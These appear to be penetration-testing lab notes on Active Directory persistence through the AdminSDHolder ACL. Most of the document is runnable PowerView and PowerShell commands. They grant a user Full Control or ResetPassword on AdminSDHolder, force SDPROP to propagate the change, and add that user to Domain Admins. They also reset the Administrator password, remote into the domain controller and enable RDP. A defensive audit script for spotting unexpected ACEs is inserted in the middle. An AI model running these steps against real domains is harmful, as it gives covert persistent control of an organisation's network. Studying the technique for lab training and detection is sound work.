Persistence ACL - AdminSDHolder

AdminSDHolder resides in the System container of a domain and is used to control the permissions, via its ACL, of certain built-in privileged groups (called Protected Groups).

The Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of the protected groups and their members with the ACL of AdminSDHolder; any differences are overwritten on the object's ACL.

Well-known abuse of some of the Protected Groups: all of the below can log on locally to a DC.

With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, the object can be used as a backdoor/persistence mechanism by adding a user with Full Control (or other interesting permissions) to the AdminSDHolder ACL.

Within 60 minutes (when SDPROP next runs), the user will be granted Full Control on the ACL of groups like Domain Admins without actually being a member of them.

You need DA privileges to do this.


#First get DA
Import-Module .\PowerView.ps1
#Add FullControl permissions for a user to the AdminSDHolder using PowerView as DA:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose


#Other interesting permissions (ResetPassword, WriteMembers) 
#for a user to the AdminSDHolder:
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose


#Create session to DC and load Invoke-SDPropagator.ps1 in the session
$sess = New-PSSession -ComputerName dcorp-dc
Invoke-Command -FilePath .\Invoke-SDPropagator.ps1 -Session $sess
Enter-PSSession -Session $sess


#Invoke Invoke-SDPropagator.ps1 from the session
Invoke-SDPropagator -ShowProgress -TimeoutMinutes 1 -Verbose
#For pre-Server 2008 machines:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose


#Check the Domain Admins ACL to see if our user is there now (the ACE is only
#present after SDPROP has run, either on its hourly schedule or via Invoke-SDPropagator).
#PowerView as normal user:
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}
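The defender-side counterpart to the Get-ObjectAcl check above: an audit script, added here and not part of the original notes, that lists every ACE on AdminSDHolder (and on a protected group, to see what SDPROP has already stamped) whose principal is not in an expected baseline. It assumes the RSAT ActiveDirectory module is installed; the baseline list and the GUID-to-name map are constructed starting points that should be captured from a known-good domain and tuned.

```powershell
# Added defensive check, not part of the original notes. Assumes the RSAT
# ActiveDirectory module (which provides the AD: drive) and read access to
# the System container.
Import-Module ActiveDirectory

$domain  = Get-ADDomain
$netbios = $domain.NetBIOSName

# Principals expected to hold ACEs on AdminSDHolder. Constructed baseline:
# capture the real one from a known-good domain and tune it before use.
$Baseline = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS', 'Everyone',
    'BUILTIN\Administrators', 'BUILTIN\Pre-Windows 2000 Compatible Access',
    'BUILTIN\Terminal Server License Servers', 'BUILTIN\Windows Authorization Access Group',
    "$netbios\Domain Admins", "$netbios\Enterprise Admins", "$netbios\Cert Publishers",
    "$netbios\Key Admins", "$netbios\Enterprise Key Admins"
)

# Friendly names for the object-type GUIDs behind the ResetPassword and
# WriteMembers rights discussed above (what PowerView's -ResolveGUIDs does).
$GuidNames = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password (ResetPassword)'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member (WriteMembers)'
    '00000000-0000-0000-0000-000000000000' = 'All'
}

function Get-UnexpectedAce {
    param(
        [string]$DistinguishedName = "CN=AdminSDHolder,CN=System,$($domain.DistinguishedName)",
        [string[]]$Allowed = $Baseline
    )
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        $who = $ace.IdentityReference.Value
        if ($Allowed -contains $who) { continue }          # baseline principal, skip
        $guid = $ace.ObjectType.ToString()
        $typeName = if ($GuidNames.ContainsKey($guid)) { $GuidNames[$guid] } else { $guid }
        [pscustomobject]@{
            Object     = $DistinguishedName
            Principal  = $who
            Rights     = $ace.ActiveDirectoryRights
            ObjectType = $typeName
            Type       = $ace.AccessControlType
            Inherited  = $ace.IsInherited
        }
    }
}

# Audit AdminSDHolder itself, then a protected group to see what SDPROP has
# already propagated onto it.
Get-UnexpectedAce | Format-Table -AutoSize
Get-UnexpectedAce -DistinguishedName (Get-ADGroup 'Domain Admins').DistinguishedName | Format-Table -AutoSize
```

Any row returned for AdminSDHolder is a change that will be copied to every protected object within the hour, so it warrants the same scrutiny as a direct change to Domain Admins.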


--------------Abusing if we were able to add ourself to Domain Admin ACL----------
#Check membership beforehand to see that the user is not yet in DA
Get-NetGroupMember -GroupName "Domain Admins" -Recurse
#Abusing FullControl (or WriteMembers) on the group using PowerView_dev:
Import-Module .\PowerView_dev.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members student529 -Verbose
#Check membership again to see that the user is now in DA
Get-NetGroupMember -GroupName "Domain Admins" -Recurse


------------#Password Reset for any account----------
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student529 -Rights ResetPassword -Verbose
#Abusing ResetPassword using PowerView_dev:
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity Administrator -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -Verbose


#Enter a session on the DC with the new password
Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\Administrator


----------#Extra-------
#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Require Network Level Authentication for RDP connections
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1

#Confirm that the ACE for student529 has propagated to the Domain Admins ACL
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'student529'}
